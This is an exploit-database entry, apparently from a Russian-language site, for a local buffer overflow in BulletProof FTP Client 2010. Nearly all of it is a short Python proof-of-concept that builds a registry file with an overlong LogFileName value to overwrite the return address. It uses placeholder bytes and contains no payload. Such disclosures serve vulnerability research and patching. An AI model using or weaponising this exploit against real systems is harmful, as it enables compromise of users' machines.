BulletProof FTP Client 2010 Buffer Overflow PoC

Свойства

Дата публикации:
07.04.2012
Цель:
BulletProof FTP Client 2010
Тип воздействия:
Компрометация системы

Код

#!/usr/bin/python

# Exploit Title: BulletProof FTP Client v2010.75.0.76 Local Buffer Overflow
# Version:       2010.75.0.76
# Date:          2012-03-11
# Author:        Julien Ahrens
# Homepage:      http://www.inshell.net
# Software Link: http://www.bpftp.com/
# Tested on:     Windows XP SP3 Professional German
# Notes:         -
# Howto:         Import Reg -> Start App

file="poc.reg"

junk1="\x41" * 448
boom="\x42\x42\x42\x42"
junk2="\x43" * 100

poc="Windows Registry Editor Version 5.00\n\n"
poc=poc + "[HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client 2010\Options]\n"
poc=poc + "\"LogFileName\"=\"" + junk1 + boom + junk2 + "\""

try:
    print "[*] Creating exploit file...\n";
    writeFile = open (file, "w")
    writeFile.write( poc )
    writeFile.close()
    print "[*] File successfully created!";
except:
    print "[!] Error while creating file!";



или введите имя

CAPTCHA